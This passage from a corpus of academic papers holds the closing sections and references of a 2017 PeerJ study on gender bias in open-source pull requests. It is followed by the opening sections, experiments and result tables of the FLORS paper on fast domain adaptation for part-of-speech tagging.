explicitly state what our biases are, and the reader can interpret the findings in that context. First, prior to conducting this research, all researchers on the team did believe that gender bias exists in open source communities, based on personal experience, news articles, and published research. However, none knew how widespread it was, or whether that bias could be detected in pull requests. Second, all researchers took Nosek and colleagues’ (2002) online test for implicit bias that evaluates a person’s implicit associations between males and females, and work and family. As is typical with most test takers, most authors tended to associate males with work and females with family (Kofink: strong; Murphy-Hill, Parnin, and Stallings: moderate; Terrell and Rainear: slight). The exception was Middleton, who exhibits a moderate association of female with career and male with family. ADDITIONAL INFORMATION AND DECLARATIONS Funding This material is based in part upon work supported by the National Science Foundation under grant number 1252995. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Science Foundation: 1252995. Competing Interests The authors declare there are no competing interests. Author Contributions • Josh Terrell, Andrew Kofink and Emerson Murphy-Hill conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Justin Middleton conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. • Clarissa Rainear analyzed the data, wrote the paper, reviewed drafts of the paper. • Chris Parnin conceived and designed the experiments, contributed reagents/material- s/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • Jon Stallings conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 27/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): NCSU IRB approved under #6708. Data Availability The following information was supplied regarding data availability: Data sets from GHTorrent and Google+ are publicly available. Raw data from figures has been supplied as a Supplementary File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.111#supplemental-information. REFERENCES Antin J, Yee R, Cheshire C, Nov O. 2011. Gender differences in Wikipedia editing. In: Proceedings of the 7th international symposium on wikis and open collaboration. 11–14. Arjona-Reina L, Robles G, Dueas S. 2014. The FLOSS2013 Free/Libre/Open Source Survey. Available at http://floss2013.libresoft.es. Arun S, Arun T. 2002. ICTs, gender and development: women in software production in Kerala. Journal of International Development 14(1):39–50 DOI 10.1002/jid.866. Benjamini Y, Hochberg Y. 1995. Controlling the false discovery rate: a practical and powerful approach to multiple testing. Journal of the Royal Statistical Society. Series B (Methodological) 289–300. Brown E, Perrett D. 1993. What gives a face its gender?. Perception 22:829–840 DOI 10.1068/p220829. Burnett M, Fleming SD, Iqbal S, Venolia G, Rajaram V, Farooq U, Grigoreanu V, Czerwinski M. 2010. Gender differences and programming environments: across programming populations. In: Proceedings of the 2010 ACM-IEEE international symposium on empirical software engineering and measurement. 28. Byrnes JP, Miller DC, Schafer WD. 1999. Gender differences in risk taking: A meta- analysis. Psychological Bulletin 125(3):367 DOI 10.1037/0033-2909.125.3.367. Chen X. 2013. STEM attrition: college students’ paths into and out of STEM fields. Statistical analysis report. NCES 2014-001. National Center for Education Statistics. Clopper C, Pearson ES. 1934. The use of confidence or fiducial limits illustrated in the case of the binomial. Biometrika 404–413. Davison HK, Burke MJ. 2000. Sex discrimination in simulated employment contexts: A meta-analytic investigation. Journal of Vocational Behavior 56(2):225–248 DOI 10.1006/jvbe.1999.1711. Doll R. 2001. Cohort studies: history of the method II. Retrospective cohort studies. Sozial-Und PräVentivmedizin 46(3):152–160 DOI 10.1007/BF01324251. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 28/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111#supplemental-information http://dx.doi.org/10.7717/peerj-cs.111#supplemental-information http://dx.doi.org/10.7717/peerj-cs.111#supplemental-information http://floss2013.libresoft.es http://dx.doi.org/10.1002/jid.866 http://dx.doi.org/10.1068/p220829 http://dx.doi.org/10.1037/0033-2909.125.3.367 http://dx.doi.org/10.1006/jvbe.1999.1711 http://dx.doi.org/10.1007/BF01324251 http://dx.doi.org/10.7717/peerj-cs.111 Gilbert JR, Williams ES, Lundberg GD. 1994. Is there gender bias in JAMA’s peer review process? Journal of the American Medical Association 272(2):139–142 DOI 10.1001/jama.1994.03520020065018. Gorman EH, Kmec JA. 2007. We (have to) try harder gender and required work effort in Britain and the United States. Gender & Society 21(6):828–856 DOI 10.1177/0891243207309900. Gousios G. 2013. The GHTorrent dataset and tool suite. Piscataway: IEEE Press, 233–236. Gousios G, Pinzger M, Van Deursen A. 2014. An exploratory study of the pull-based software development model. In: Proceedings of the 36th international conference on software engineering. ICSE 2014, New York: ACM 345–355. Gousios G, Vasilescu B, Serebrenik A, Zaidman A. 2014. Lean GHTorrent: GitHub data on demand. 384–387. Graham JW, Smith SA. 2005. Gender differences in employment and earnings in science and engineering in the US. Economics of Education Review 24(3):341–354 DOI 10.1016/j.econedurev.2004.06.005. Heilman ME, Wallen AS, Fuchs D, Tamkins MM. 2004. Penalties for success: reactions to women who succeed at male gender-typed tasks. Journal of Applied Psychology 89(3):416 DOI 10.1037/0021-9010.89.3.416. Ho D, Imai K, King G, Stuart E. 2011. MatchIt: nonparametric preprocessing for parametric causal inference. Journal of Statistical Software 42(1):1–28 DOI 10.18637/jss.v042.i08. Howard M, Pincus J, Wing JM. 2005. Measuring relative attack surfaces. In: Computer security in the 21st century. Springer, 109–137. Knobloch-Westerwick S, Glynn CJ, Huge M. 2013. The Matilda Effect in science communication an experiment on gender bias in publication quality per- ceptions and collaboration interest. Science Communication 35(5):603–625 DOI 10.1177/1075547012472684. Krumholz HM, Douglas PS, Lauer MS, Pasternak RC. 1992. Selection of patients for coronary angiography and coronary revascularization early after myocar- dial infarction: is there evidence for a gender bias? Annals of Internal Medicine 116(10):785–790 DOI 10.7326/0003-4819-116-10-785. Lagesen VA. 2008. A cyberfeminist utopia? Perceptions of gender and computer science among Malaysian women computer science students and faculty. Science, Technology & Human Values 33(1):5–27 DOI 10.1177/0162243907306192. Landy FJ. 2008. Stereotypes, bias, and personnel decisions: strange and stranger. Industrial and Organizational Psychology 1(4):379–392 DOI 10.1111/j.1754-9434.2008.00071.x. Lemkau JP. 1979. Personality and background characteristics of women in male- dominated occupations: a review. Psychology of Women Quarterly 4(2):221–240 DOI 10.1111/j.1471-6402.1979.tb00710.x. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 29/30 https://peerj.com http://dx.doi.org/10.1001/jama.1994.03520020065018 http://dx.doi.org/10.1177/0891243207309900 http://dx.doi.org/10.1016/j.econedurev.2004.06.005 http://dx.doi.org/10.1037/0021-9010.89.3.416 http://dx.doi.org/10.18637/jss.v042.i08 http://dx.doi.org/10.1177/1075547012472684 http://dx.doi.org/10.7326/0003-4819-116-10-785 http://dx.doi.org/10.1177/0162243907306192 http://dx.doi.org/10.1111/j.1754-9434.2008.00071.x http://dx.doi.org/10.1111/j.1471-6402.1979.tb00710.x http://dx.doi.org/10.7717/peerj-cs.111 McLoughlin LA. 2005. Spotlighting: emergent gender bias in undergraduate engineering education. Journal of Engineering Education 94(4):373–381 DOI 10.1002/j.2168-9830.2005.tb00865.x. Mockus A, Weiss DM. 2000. Predicting risk of software changes. Bell Labs Technical Journal 5(2):169–180. Moss-Racusin CA, Dovidio JF, Brescoll VL, Graham MJ, Handelsman J. 2012. Science faculty’s subtle gender biases favor male students. Proceedings of the Na- tional Academy of Sciences of the United States of America 109(41):16474–16479 DOI 10.1073/pnas.1211286109. Nafus D. 2012. ‘Patches don’t have gender’: what is not open in open source software. New Media & Society 14(4):669–683 DOI 10.1177/1461444811422887. Nosek BA, Banaji M, Greenwald AG. 2002. Harvesting implicit group attitudes and beliefs from a demonstration web site.. Group Dynamics: Theory, Research, and Practice 6(1):101 DOI 10.1037/1089-2699.6.1.101. Reagle J. 2012. ‘‘Free as in sexist?’’ Free culture and the gender gap. First Monday 18(1). Roth PL, Purvis KL, Bobko P. 2012. A meta-analysis of gender group differences for measures of job performance in field studies. Journal of Management 38(2):719–739. Shaw SR, Braden JP. 1990. Race and gender bias in the administration of corporal punishment. School Psychology Review 19(3):378–383. Vasilescu B, Capiluppi A, Serebrenik A. 2014. Gender, representation and online participation: a quantitative study. Interacting with Computers 26(5):488–511 DOI 10.1093/iwc/iwt047. Vasilescu B, Posnett D, Ray B, Van den Brand MGJ, Serebrenik A, Devanbu P, Filkov V. 2015. Gender and tenure diversity in GitHub teams. In: CHI conference on human factors in computing systems, CHI. ACM, 3789–3798. Yu Y, Wang H, Filkov V, Devanbu P, Vasilescu B. 2015. Wait for it: determinants of pull request evaluation latency on GitHub. In: Mining software repositories (MSR), 2015 IEEE/ACM 12th working conference on. IEEE, 367–371. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 30/30 https://peerj.com http://dx.doi.org/10.1002/j.2168-9830.2005.tb00865.x http://dx.doi.org/10.1073/pnas.1211286109 http://dx.doi.org/10.1177/1461444811422887 http://dx.doi.org/10.1037/1089-2699.6.1.101 http://dx.doi.org/10.1093/iwc/iwt047 http://dx.doi.org/10.7717/peerj-cs.111 work_pu54zjotk5ed3ol4ajhrlzpfju ---- FLORS: Fast and Simple Domain Adaptation for Part-of-Speech Tagging FLORS: Fast and Simple Domain Adaptation for Part-of-Speech Tagging Tobias Schnabel Department of Computer Science Cornell University tbs49@cornell.edu Hinrich Schütze Center for Information & Language Processing University of Munich inquiries@cislmu.org Abstract We present FLORS, a new part-of-speech tag- ger for domain adaptation. FLORS uses ro- bust representations that work especially well for unknown words and for known words with unseen tags. FLORS is simpler and faster than previous domain adaptation methods, yet it has significantly better accuracy than several baselines. 1 Introduction In this paper we describe FLORS, a part-of-speech (POS) tagger that is Fast in training and tagging, uses LOcal context only (as opposed to finding the optimal tag sequence for the entire sentence), per- forms Robustly on target domains (TDs) in unsu- pervised domain adaptation (DA) and is Simple in architecture and feature representation. FLORS constructs a robust representation of the local context of the word v that is to be tagged. This representation consists of distributional fea- tures, suffixes and word shapes of v and its local neighbors. We show that it has two advantages. First, since the main predictors used by FLORS are distributional features (not the word’s identity), FLORS predicts unseen tags of known words bet- ter than prior work on DA for POS. Second, since FLORS uses representations computed from unla- beled text, representations of unknown words are in principle of the same type as representations of known words; this property of FLORS results in better performance on unknown words compared to prior work. These two advantages are especially beneficial for TDs that contain high rates of unseen tags of known words and high rates of unknown words. We show that FLORS achieves excellent DA tagging results on the five domains of the SANCL 2012 shared task (Petrov and McDonald, 2012) and outperforms three state-of-the-art taggers on Blitzer et al.’s (2006) biomedical data. FLORS is also simpler and faster than other POS DA methods. It is simple in that the input repre- sentation consists of three simple types of features: distributional count features and two types of binary features, suffix and shape features. Many other word representations that are used for improving general- ization (e.g., (Brown et al., 1992; Collobert et al., 2011)) are costly to train or have difficulty han- dling unknown words. Our representations are fast to build and can be created on-the-fly for unknown words that occur during testing. The learning architecture is simple and fast as well. We train k binary one-vs-all classifiers that use local context only and no sequence informa- tion (where k is the number of tags). Thus, tag- ging complexity is O(k). Many other learning se- tups for DA are more complex; e.g., they learn rep- resentations (as opposed to just counting), they learn several classifiers for different subclasses of words (e.g., known vs. unknown) or they combine left-to- right and right-to-left taggings. The next two sections describe experimental data, setup and results. Results are discussed in Section 4. We compare FLORS to alternative word representa- tions in Section 5 and to related work in Section 6. Section 7 presents our conclusions. 2 Experimental data and setup Data. Our source domain is the Penn Treebank (Marcus et al., 1993) of Wall Street Journal (WSJ) 15 Transactions of the Association for Computational Linguistics, 2 (2014) 15–26. Action Editor: Sharon Goldwater. Submitted 9/2013; Revised 11/2013; Published 2/2014. c©2014 Association for Computational Linguistics. text. Following Blitzer et al. (2006), we use sections 2-21 for training and 100,000 WSJ sentences from 1988 as unlabeled data in training. We evaluate on six different TDs. The first five TDs (newsgroups, weblogs, reviews, answers, emails) are from the SANCL shared task (Petrov and McDonald, 2012). Additionally, the SANCL dataset contains sections 22 and 23 of the WSJ for in-domain development and testing, respectively. Each SANCL TD has an unlabeled training set of 100,000 sentences and development and test sets of about 1000 labeled sentences each. The sixth TD is BIO, the Penn BioTreebank data set distributed by Blitzer. It consists of dev and test sets of 500 sen- tences each and 100,000 unlabeled sentences. Classification setup. Similar to SVMTool (Giménez and Màrquez, 2004) and Choi and Palmer (2012) (henceforth: C&P), we use local context only for tagging instead of performing sequence classifi- cation. For a word w occurring as token vi in a sen- tence, we build a feature vector for a local window of size 2l + 1 around vi. The representation of the object to be classified is this feature vector and the target class is the POS tag of vi. We use the linear L2-regularized L2-loss SVM implementation provided by LIBLINEAR (Fan et al., 2008) to train k one-vs-all classifiers on the train- ing set where k is the number of POS tags in the training set (in our case k = 45). We train with un- tuned default parameters; in particular, C = 1. In the special case of linear SVMs, the value of C does not need to be tuned exhaustively as the solution re- mains constant after C has reached a certain thresh- old value C∗ (Keerthi and Lin, 2003). Training can easily be parallelized by giving each binary SVM its own thread. Windows. The local context for tagging token vi is a window of size 2l + 1 centered around vi: (vi−l, . . . , vi, . . . , vi+l). We pad sentences on either side with 〈BOUNDARY〉 to ensure sufficient con- text for all words. Given a mapping f from words to feature vectors (see below), the representation F of a token vi is the concatenation of the 2l + 1 word vectors in its window F(vi) = f(vi−l)⊕ . . .⊕f(vi+l) where ⊕ is vector concatenation. Word features. We represent each word w by four components: (i) counts of left neighbors, (ii) counts of right neighbors, (iii) binary suffix features and (iv) binary shape features. These four compo- nents are concatenated: f(w) = f left(w)⊕f right(w)⊕f suffix(w)⊕f shape(w) We consider these sources of information equally important and normalize each of the four compo- nent vectors to unit length. Normalization also has a beneficial effect on SVM training time because it alleviates numerical problems (Fan et al., 2008). Distributional features. We follow a long tra- dition of older (Finch and Chater, 1992; Schütze, 1993; Schütze, 1995) and newer (Huang and Yates, 2009) work on creating distributional features for POS tagging based on local left and right neighbors. Specifically, the ith entry xi of f left(w) is the weighted number of times that the indicator word ci occurs immediately to the left of w: xi = tf (freq (bigram(ci, w))) where ci is the word with frequency rank i in the cor- pus, freq (bigram(ci, w)) is the number of times the bigram “ci w” occurs in the corpus and we weight the non-zero frequencies logarithmically: tf(x) = 1 + log(x). tf-weighting has been used by other re- searchers (Huang and Yates, 2009) and showed good performance in our own previous work. f right(w) is defined analogously. We restrict the set of indicator words to the n = 500 most fre- quent words in the corpus. To avoid zero vectors, we add an entry xn+1 to each vector that counts omitted contexts: xn+1 = tf   ∑ j:j>n freq (bigram(cj, w))   We compute distributional vectors on the joint corpus DALL of all labeled and unlabeled text of source domain and TD. The text is preprocessed by lowercasing everything – which is often done when computing word representations, e.g., by Turian et al. (2010) – and by padding sentences with 〈BOUNDARY〉 tokens. Suffix features. Suffixes are promising for DA because basic morphology rules are the same in dif- ferent domains. In contrast to other work on tagging 16 model classifier features 1 TnT HMM p−{0,1,2}, v0, suffixes (for OOVs) 2 Stanford bidir. MEMM p±{0,1,2}, v±{0,1}, affixes, orthography 3 SVMTool SVM p±{0,1,2,3}, v±{0,1,2,3}, affixes, orthography, word length 4 C&P SVM p±{0,1,2,3}, v±{0,1,2,3}, affixes, orthography 5 FLORS SVM distributions of v±{0,1,2}, suffixes, orthography Table 1: Overview of baseline taggers and FLORS. vi: token, pi: POS tag. Positions included in the sets of token indices are relative to the position i of the word v0 to be tagged; e.g., p±{0,1,2} is short for {p−0, p−1, p−2, p0, p1, p2}. To represent tokens vi, models 1–4 use vocabulary indices and FLORS uses distributional representations. Models 2–4 use combinations of features (e.g., tag-word) as well. (e.g., Ratnaparkhi (1996), Toutanova et al. (2003), Miller et al. (2007)) we simply use all (lowercase) suffixes to avoid the need for selecting a subset of suffixes; and we treat all words equally as opposed to using suffix features for only a subset of words. For suffix s, we set the dimension corresponding to s in f suffix(w) to 1 if lowercased w ends in s and to 0 otherwise. Note that w is a suffix of itself.1 Shape features. We use the Berkeley parser word signatures (Petrov and Klein, 2007). Each word is mapped to a bit string encompassing 16 binary indicators that correspond to different orthographic (e.g., does the word contain a digit, hyphen, upper- case character) and morphological (e.g., does the word end in -ed or -ing) features. There are 50 unique signatures in WSJ. We set the dimension of f shape(w) that corresponds to the signature of w to 1 and all other dimensions to 0. We note that the shape features we use were designed for English and prob- ably would have to be adjusted for other languages. Baselines. We address the problem of unsuper- vised domain adaptation for POS tagging. For this problem, we consider three types of baselines: (i) high-performing publicly available systems, (ii) the taggers used at SANCL and (iii) POS DA results published for BIO. Most of our experiments use taggers from cate- gory (i) because we can ensure that experimental conditions are directly comparable. The four base- lines in category (i) are shown in Table 1. Three have near state-of-the-art performance on WSJ: SVMTool (Giménez and Màrquez, 2004), Stanford 1One could also compute these suffixes for _w (w prefixed by underscore) instead of for w to include words as distinguish- able special suffixes. We test this alternative in Table 2, line 15. (Toutanova et al., 2003) (a birectional MEMM) and C&P. TnT (Brants, 2000) is included as a represen- tative of fast and simple HMM taggers. In addition, C&P is a tagger that has been extensively tested in DA scenarios with excellent results. Unless other- wise stated, we train all models using their default configuration files. We use the optimized parameter configuration published by C&P for the C&P model. Test set results will be compared with the SANCL taggers (category (ii)) at the end of Section 3. As far as category (iii) is concerned, most work on POS DA has been evaluated on BIO. We discuss our concerns about the BIO evaluation sets in Sec- tion 4, but also show that FLORS beats previously published results on BIO as well (see Table 6). 3 Experimental results We train k binary SVM classifiers on the training set. A token in the test set is classified by building its feature vector, running the classifiers on it and then assigning it to the POS class whose one-vs-all LIBLINEAR classifier returns the largest score. Results for ALL accuracy (accuracy for all to- kens) and OOV accuracy (accuracy for tokens not occurring in the labeled WSJ data) are reported in Table 2. Results with an asterisk are significantly worse than a column’s best result using McNemar’s test (p < .001). We use the same test and p-value throughout this paper. The basic FLORS model (Table 2, line 5) uses window size 5 (l = 2). Each word in the window has 1002 distributional features (501 left and right), 91,161 suffix features and 50 shape features. The final feature vector for a token has a dimensionality of about 500,000, but is very sparse. FLORS outperforms all baselines on the five TDs 17 newsgroups reviews weblogs answers emails wsj ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV 1 TnT 88.66∗ 54.73∗ 90.40∗ 56.75∗ 93.33∗ 74.17∗ 88.55∗ 48.32∗ 88.14∗ 58.09∗ 95.75∗ 88.30 2 Stanford 89.11∗ 56.02∗ 91.43∗ 58.66∗ 94.15∗ 77.13∗ 88.92∗ 49.30∗ 88.68∗ 58.42∗ 96.83 90.25 3 SVMTool 89.14∗ 53.82∗ 91.30∗ 54.20∗ 94.21∗ 76.44∗ 88.96∗ 47.25∗ 88.64∗ 56.37∗ 96.63 87.96 4 C&P 89.51∗ 57.23∗ 91.58∗ 59.67∗ 94.41∗ 78.46∗ 89.08∗ 48.46∗ 88.74∗ 58.62∗ 96.78 88.65 5 F L O R S basic 90.86 66.42 92.95 75.29 94.71 83.64 90.30 62.15 89.44∗ 62.61 96.59 90.37 6 n = 250 90.93 67.03 92.93 75.45 94.69 83.69 90.29 62.20 89.63 63.43 96.56∗ 89.45 7 v ± {0 ,1 ,2 } n = 0 89.14∗ 55.59∗ 91.80∗ 66.31∗ 93.40∗ 72.55∗ 89.47∗ 55.82∗ 88.21∗ 57.83∗ 96.29∗ 85.55∗ 8 no suffixes 90.60 65.17 92.74 71.94∗ 94.77 84.92 89.77∗ 58.71∗ 89.30∗ 62.09 96.28∗ 88.88 9 no shapes 89.70∗ 63.10∗ 92.24∗ 68.70∗ 92.60∗ 74.72∗ 89.55∗ 59.08∗ 89.63 64.17 95.52∗ 83.94∗ 10 v ± {1 ,2 } n = 0 90.61∗ 65.95 92.76∗ 75.56 94.62 84.62 90.23 61.87 89.40∗ 63.82 96.51∗ 90.02 11 no suffixes 90.66 64.78∗ 92.88 75.08 94.83 84.52 90.36 61.92 89.42 62.74 96.64 89.45 12 no shapes 90.74 67.03 93.02 75.88 94.57 83.83 90.23 61.73 89.41∗ 63.49 96.57 90.25 13 l = 1 90.44∗ 63.62∗ 92.69∗ 75.72 94.48∗ 84.03 90.02∗ 62.66 89.17∗ 62.71 96.44∗ 88.65 14 L-to-R 90.56∗ 66.08 92.97 75.40 94.57 83.79 90.43 62.80 89.43 63.13 96.53∗ 90.94 15 voc. indices 90.93 66.64 92.91 75.03 94.71 84.08 90.27 61.92 89.37∗ 62.26 96.63 90.60 Table 2: Tagging accuracy of four baselines and FLORS on the dev sets. The table is structured as follows: baselines (lines 1–4), basic FLORS setup (lines 5–6), effect of omitting one of the three feature types if the word to be tagged is changed compared to the basic FLORS setup (lines 7–9) and if the word to be tagged is not changed compared to basic FLORS (lines 10–12), effect of three important configuration choices on tagging accuracy: window size (line 13), inclusion of prior tagging decision (line 14) and vocabulary index (line 15). n: number of indicator words. 2l +1: size of the local context window. Lines 10–12: Only the neighbors of v0 are modified compared to basic (line 5). Lines 7–9: All five token representations (including v0) are modified. A column’s best result is bold. (line 5 vs. lines 1–4). Only in-domain on WSJ, three baselines are slightly superior. The baselines are slightly better on ALL accuracy because they were designed for tagging in-domain data and use feature sets that have been found to work well on the source domain. Generally, C&P performs best for DA among the baselines. On answers and WSJ, how- ever, Stanford has better overall accuracies. These results are in line with C&P. On lines 6–15, we investigate how different mod- ifications of the basic FLORS model affect perfor- mance. First, we examine the effect of leaving out components of the representation: distributional fea- tures (f left(w), f right(w)), suffixes (f suffix(w)) and shape features (f shape(w)). Distributional features boost performance in all domains: ALL and OOV accuracies are consistently worse for n = 0 (line 7) than for n ∈ {250, 500} (lines 6&5). FLORS with n = 250 has better OOV accuracies in 5 of 6 domains. However, ALL accu- racy for FLORS with n = 500 is better in the major- ity of domains. The main result of this comparison is that FLORS does not seem to be very sensitive to the value of n if n is large enough. Shape features also improve results in all do- mains, with one exception: emails (lines 9 vs 5). For emails, shape features decrease ALL accuracy by .19 and OOV accuracy by 1.56. This may be due to the fact that many OOVs are NNP/NN and that tagging conventions for NNP/NN vary between do- mains. See Section 4 for discussion. Performance benefits from suffixes in all domains but weblogs (lines 8 vs 5). Weblogs contain many foreign names such as Abdul and Yasim. For these words, shapes apparently provide better informa- tion for classification than suffixes. ALL accura- cies suffer little when leaving out suffixes, but the feature space is much smaller: about 3000 dimen- sions. Thus, for domains where we expect few OOVs, omitting suffix features could be considered. Lines 7–9 omit one of the components of f(vi) for all five words in the local context: i ∈ {−2,−1, 0, 1, 2}. Lines 10–12 omit the same com- ponents for the neighbor words only – i.e., i ∈ {−2,−1, 1, 2} – and leave f(v0) unchanged. 14 of the 6 × 3 ALL accuracies on lines 10–12 are worse than FLORS basic, 4 are better. The largest differ- ences are .25 for newsgroups and .19 for reviews (lines 5 vs 10), but differences for the other domains are negligible. This shows that the most important 18 feature representation is that of v0 (not surprisingly) and that the distributional features of the other words can be omitted at the cost of some loss in accuracy if a small average number of active features is desired. Another FLORS parameter is the size of the local context. Surprisingly, OOV accuracies benefit a bit in four domains if we reduce l from 2 to 1 (lines 13 vs 5). However, ALL accuracy consistently drops in all six domains. This argues for using l = 2, i.e., a window size of 5. Results for left-to-right (L-to-R) tagging are given on line 14. Similar to SVMTool and C&P, each sen- tence is tagged from left to right and previous tag- ging decisions are used for the current classification. In this setting, we use the previous tag pi−1 as one additional feature in the feature vector of vi. The effect of left-to-right is similar to the effect of omitting suffixes: OOV accuracies go up in some domains, but ALL accuracies decrease (except for an increase of .02 for reviews). This is in line with the experiments in (Schnabel and Schütze, 2013) where sequential information in a CRF was not ro- bust across domains. OOV tagging may benefit from correct previous tags because the larger left context that is indirectly made available by left-to-right tag- ging compensates partially for the lack of informa- tion about the OOV word. In contrast to standard approaches to POS tag- ging, the FLORS basic representation does not con- tain vocabulary indices. Line 15 shows what hap- pens if we add them; the dimensionality of the fea- ture vector is increased by 5|V | – where V is the training set vocabulary – and in training one binary feature is set to one for each of the five local con- text words. Performance is almost indistinguishable from FLORS basic, suggesting that only using suf- fixes – which can be viewed as “ambiguous” vocab- ulary indices, e.g., “at” is on for “at”, “mat”, “hat”, “laundromat” etc – is sufficient. In summary, we find that distributional features, word signatures and suffixes all contribute to suc- cessful POS DA. Factors with only minor impact on performance are the number of indicator words used for the distributional representations, the win- dow size l and the tagging scheme (L-to-R vs. non- L-to-R). Unknown words and known words behave differently with respect to certain feature choices. The different behavior of unknown and known words suggests that training and optimizing two sep- arate models – an approach used by SVMTool – would further increase tagging accuracy. Note that there has been at least one publication (Schnabel and Schütze, 2013) on optimizing a separate model for unknown words that has in some cases better per- formance on OOV accuracy than what we publish here.2 However, this would complicate the architec- ture of FLORS. We opted for a maximally simple model in this paper, potentially at the cost of some performance. Test set results. Table 3 reports results on the test sets. FLORS again performs significantly better on all five TDs, both on ALL and OOV. Only in-domain on WSJ, ALL performance is worse. Finally, we compare our results to the POS taggers for which performance was reported at SANCL 2012 (Petrov and McDonald, 2012, Ta- ble 4). Constituency-based parsers – which also tag words as a by-product of deriving complete parse trees – are excluded from the comparison be- cause they are trained on a richer representation, the syntactic structure of sentences.3 FLORS’ results are better than the best non-parsing-based results at SANCL 2012, which were accuracies of 92.32 on newsgroups (HIT), 90.65 on reviews (HIT) and 91.07 on answers (IMS-1). 4 Discussion Advantages of FLORS representation. As we can see in Table 1, the main representational difference between FLORS and the other taggers is that the FLORS representation does not include vocabulary indices of the word to be tagged or its neighbors – the FLORS vector only consists of distributional, suffix and shape features. This is an obvious advantage for OOVs. In other representational schemes, OOVs have representa- tions that are fundamentally different from known 2Schnabel and Schütze (2013) report OOV accuracies of 56.62 (newsgroups), 64.61 (reviews), 71.86 (weblogs), 54.28 (answers), 61.05 (emails) and 64.64 (BIO) for their basic model and even higher OOV accuracies if parameters are optimized on a per-domain basis. 3DCU-Paris13 is listed in the dependency parser tables, but DCU-Paris13 results are derived from a constituency parser. DCU also developed sophisticated preprocessing rules for the different domains, which can be viewed as a kind of manual domain adaptation. 19 newsgroups reviews weblogs answers emails wsj ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV ALL OOV 1 TnT 90.85∗ 56.60∗ 89.67∗ 50.98∗ 91.37∗ 62.65∗ 89.36∗ 51.82∗ 87.38∗ 55.12∗ 96.57∗ 86.27 2 Stanford 91.25∗ 57.96∗ 90.30∗ 51.87∗ 92.32∗ 67.85∗ 89.74∗ 53.41∗ 87.77∗ 57.10∗ 97.43 88.71 3 SVMTool 91.21∗ 54.40∗ 90.01∗ 45.05∗ 92.05∗ 63.59∗ 89.90∗ 51.07∗ 87.74∗ 53.23∗ 97.26 86.47 4 C&P 91.68∗ 60.58∗ 90.42∗ 51.12∗ 92.22∗ 66.91∗ 89.90∗ 53.31∗ 87.91∗ 54.47∗ 97.44 88.20 5 FLORS basic 92.41 66.91 92.25 70.87 93.14 75.32 91.17 67.93 88.67 61.09 97.11∗ 87.79 Table 3: Tagging accuracy of four baselines and FLORS on the test sets. newsgroups reviews weblogs answers emails wsj bio pc t to ke ns unknown tag 0.31 0.06 0.00 0.25 0.80 0.00 0.98 OOV 10.34 6.84 8.45 8.53 10.56 2.72 19.86 unseen word+tag 2.44 2.22 1.46 2.91 3.47 0.61 2.50 ac cu ra cy on un se en w or d+ ta g TnT 0.00 0.00 0.00 0.00 0.00 0.00 0.00 Stanford 3.66 5.74 9.40 5.46 2.77 15.23 4.64 SVMTool 0.00 0.16 0.00 0.00 0.10 0.00 0.00 C&P 14.47 14.75 20.51 13.37 10.29 38.07 8.98 FLORS basic 21.06 21.97 21.65 17.19 15.13 41.12 12.69 Table 4: Top: Percentage of unknown tags, OOVs and unseen word+tag combinations (i.e., known words tagged with unseen tags) in the dev sets. Bottom: Tagging accuracy on unseen word+tag. words – since their vocabulary index does not oc- cur in the training set and cannot be used for predic- tion. In contrast, given enough unlabeled TD data, FLORS represents known and unknown words in es- sentially the same way and prediction of the correct tag is easier. This explanation is supported by the experiments in Table 2: FLORS beats all other sys- tems on OOVs – even in-domain on WSJ. In our analysis we found that apart from better handling of OOVs there is a second beneficial ef- fect of distributional representations: they facilitate the correct tagging of known words occurring with tags unseen in the training set, which we call un- seen word+tags. Table 4 gives statistics on this case and shows that unseen word+tags occur at least two times as often out-of-domain (e.g., 1.46% for we- blogs) than in-domain (.61% for WSJ). The bottom part of the table shows performance of the five tag- gers on unseen word+tags. FLORS is the top per- former on all seven domains, with large differences of more than 5% in some domains. The explanation is similar to the OOV case: FLORS does not restrict the set of possible POS’s of a word. The other taggers in Table 2 use the vocabu- lary index of the word to be tagged and will therefore give a strong preference to seen tags. Since FLORS uses distributional features, it can more easily assign an unseen tag as long as it is compatible with the overall pattern of distribution, suffixes and shapes typical of the tag. C&P also perform relatively well on unseen word+tag due to the ambiguity classes in their model, but FLORS representations are better for every domain. We take these results to mean that constraints on a word’s possible POS tags may well be helpful for in-domain data, but for out-of-domain data an overly strong bias for a word’s observed tags is harmful. It is important to stress that representations sim- ilar to FLORS representations have been used for a long time; we would expect many of them to have similar advantages for unseen word+tags. E.g., Brown clusters (Brown et al., 1992) and word em- beddings (Collobert et al., 2011) are similar to FLORS in this respect. However, FLORS represen- tations are extracted by simple counting whereas the computation of Brown clusters or word embeddings is much more expensive. The speed with which FLORS representations can be computed is partic- ularly beneficial when taggers need to be adapted to new domains. FLORS can easily adapt its rep- resentations on the fly – as each new occurrence of a word is encountered, the counts that are the basis 20 for the xi can simply be incremented. We present a direct comparison of FLORS representations with other representations in Section 5. “Local context” vs. sequence classification. The most common approach to POS tagging is to tag a sentence with its most likely sequence; in contrast, independent tagging of local context is not guaran- teed to find the best sequence. Recent work on En- glish suggests that window-based tagging can per- form as well as sequence-based methods (Liang et al., 2008; Collobert et al., 2011). Toutanova et al. (2003) report similar results. In our experiments, we also did not find consistent improvements when we incorporated sequence constraints (Table 2, line 14). However, there may be languages and appli- cations involving long-distance relationships where local-context classification is suboptimal. Local-context classification has two advantages compared to sequence classification. (i) It simplifies the classification and tagging setup: we can use any existing statistical classifier. Sequence classification limits 